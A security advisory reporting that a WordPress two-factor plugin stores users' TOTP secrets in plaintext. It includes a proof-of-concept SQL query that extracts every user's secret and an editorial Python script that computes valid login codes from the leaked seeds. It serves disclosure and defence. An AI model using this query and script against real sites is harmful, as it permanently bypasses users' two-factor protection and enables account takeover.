Affected plugin | Google Authenticator |
Active installs | 30,000+ |
Vulnerable version | <= 0.54 |
Audited version | 0.54 |
Fully patched version | – |
Recommended remediation | Removal of the plugin |
Description
The plugin stores users’ TOTP secret keys as plaintext in the database. An attacker who can exploit a read-only SQL injection (of which the WordPress ecosystem produces a seemingly never-ending supply) can read every user’s secret and bypass all 2FA checks for all users indefinitely. A TOTP secret does not expire: the codes derived from it stay valid until the user enrolls a new secret, so the 2FA protection remains broken even after the injection itself has been fixed.
Proof of concept
The plugin stores users’ TOTP secrets as plaintext in the “wp_usermeta” table (“wp_” is the default WordPress table prefix and may differ per installation).
// EDITOR: $GA_secret is just a random string. The fourth argument (true) makes the
// option global, so the row is stored under the exact meta_key 'googleauthenticator_secret'.
update_user_option( $user_id, 'googleauthenticator_secret', $GA_secret, true );
Any read-only SQLi (or other read access to the database) that lets the attacker run the following query hands over every enrolled user’s secret; with the secret, the attacker can compute valid TOTP codes for that user at any point in time, compromising all two-factor checks for all users:
SELECT user_id, meta_value, meta_key FROM wp_usermeta WHERE meta_key = 'googleauthenticator_secret'
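The following Python is an added editorial example, not code from the plugin or from the original advisory. It shows what the rows returned by the query above are worth to an attacker: given the leaked meta_value, a standard RFC 6238 TOTP computation produces the code the plugin will accept for that user at any chosen time. It assumes the stored secret is the base32 TOTP seed the user scans into their authenticator app (the format such apps consume); the sample rows are constructed, and the second seed is the RFC 4226/6238 reference secret so the output can be checked against the published test vectors.

```python
"""Deriving valid TOTP codes from leaked plugin secrets (editorial example).

Assumption: the leaked meta_value is the base32-encoded TOTP seed. The rows
below are constructed sample data shaped like the advisory's SELECT result.
"""
import base64
import hashlib
import hmac
import struct
import time

# Constructed sample of (user_id, meta_value, meta_key) rows. The second
# seed is base32("12345678901234567890"), the RFC 4226/6238 reference key.
LEAKED_ROWS = [
    (1, "JBSWY3DPEHPK3PXP", "googleauthenticator_secret"),
    (2, "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ", "googleauthenticator_secret"),
]


def hotp(secret_b32: str, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP over a base32 seed: HMAC-SHA1 plus dynamic truncation."""
    seed = secret_b32.strip().upper()
    # base32 decoding requires the input padded to a multiple of 8 chars
    key = base64.b32decode(seed + "=" * (-len(seed) % 8))
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret_b32: str, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / step)."""
    return hotp(secret_b32, unix_time // step, digits)


def codes_for_leaked_rows(rows, unix_time: int) -> dict:
    """Map each leaked user_id to the code that passes the plugin's 2FA check
    at unix_time. Because the seed never changes, the same call yields valid
    codes for any future time as well, which is why the leak is permanent."""
    return {
        user_id: totp(meta_value, unix_time)
        for user_id, meta_value, meta_key in rows
        if meta_key == "googleauthenticator_secret"
    }


if __name__ == "__main__":
    now = int(time.time())
    for uid, code in codes_for_leaked_rows(LEAKED_ROWS, now).items():
        print(f"user_id={uid} current TOTP code={code}")
```

Run it and the printed codes match what an authenticator app enrolled with the same seeds would show at that moment; nothing beyond the leaked row and the current time is needed. This is also why the remediation column above says removal rather than a patch: encrypting the column in a later version would not help users whose seeds have already been read, since their seeds would have to be re-enrolled to regain any protection.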
Timeline
Vendor contacted | September 12, 2022 |
First Response | September 12, 2022 |
Fully patched at | – |
Publicly disclosed | April 24, 2023 |
Miscellaneous
- The developer did not consider this a security issue.